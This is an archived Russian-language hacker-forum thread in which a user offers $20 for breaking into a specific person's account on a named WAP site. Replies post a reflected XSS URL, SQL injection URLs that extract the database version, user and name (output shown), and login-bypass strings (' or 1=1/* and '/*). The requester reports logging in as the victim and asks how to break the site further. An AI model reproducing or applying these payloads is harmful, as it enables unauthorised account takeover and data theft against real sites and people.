Просмотр полной версии : Взломать человечка на вап сайте????!!!!
Взломать человечка, на сайте wap.sotchi.ru Дам 20 бакков. Пароль простой цифры от 2-6 может быть.
Проверить надо :)
http://wap.sotchi.ru/cgi-bin/wap_index.pl?login=a%3Cscript%3Ealert(/XEk/)%3C/script%3E'sa'&password=asd%27&z=737
=\
http://wap.sotchi.ru/cgi-bin/wap_index.pl?login=a%3Cscript%3Ealert(/XEk/)%3C/script%3E'sa'&password=asd%27&z=737
=\
Это вап, тут нафиг не нужны xss
halkfild
14.01.2008, 17:10
там и скуля есть /*жаль версия 4-тая*/ =\ могу))
выкладываю хацкерам :D :D
скуля
http://meet.sotchi.ru/vp/?sid=ca9e5ced3b10b0544574c94448d31ef0&uid=8719+and+1=1/*
поле
http://meet.sotchi.ru/vp/?sid=ca9e5ced3b10b0544574c94448d31ef0&uid=-8719+union+select+66666/*/*
системная инфа.. версия и тд..
http://meet.sotchi.ru/vp/?sid=ca9e5ced3b10b0544574c94448d31ef0&uid=-8719+union+select+concat_ws(0x3a3a,version(),user( ),database())/*
4.0.24::sotchi@localhost::sotchi
там в таблице префикс и сама таблица... ковырять особо некогда, завтра екзамен =\ так что ковыряйте хацкеры
там и скуля есть /*жаль версия 4-тая*/ =\ могу))
Угу и не одна... только таблицы не подобрать
admin
' or 1=1/*
Это прокатывает, но почему-то выбрасывает.
Пацаны это хорошо, но для меня это темный лес, может расшифруете что уда вставлять?
Пацаны это хорошо, но для меня это темный лес, может расшифруете что уда вставлять?
Да, расшифруем :) введи логин, а после него
'/*
И ты войдешь под его именем
Macro, респект! А то мну тож выкидывало от пасса ' or 1=1/*
Пацаны, огромный респект :) Очень помогли :)
Закрыли дырку больше нельзя так заходить!!! есть ли еще такие возможности??? Как сделать так, чтобы его вообще поломать?
Кто еще этот сайтик посмотреть может?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot